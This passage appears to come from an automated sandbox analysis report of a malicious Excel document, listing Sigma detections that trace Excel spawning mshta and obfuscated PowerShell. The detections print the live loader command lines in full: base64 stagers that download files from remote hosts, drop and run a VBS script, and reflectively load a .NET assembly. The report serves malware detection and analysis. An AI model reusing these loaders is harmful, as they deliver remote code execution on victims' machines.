INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICA
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3552, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3844, ProcessName: mshta.exe
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, ProcessId: 3112, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", ProcessId: 3320, ProcessName: csc.exe
                    Sigma detected: Excel Network Connections
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
                    Sigma detected: Suspicious Office Outbound Connections
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3552, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                    Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 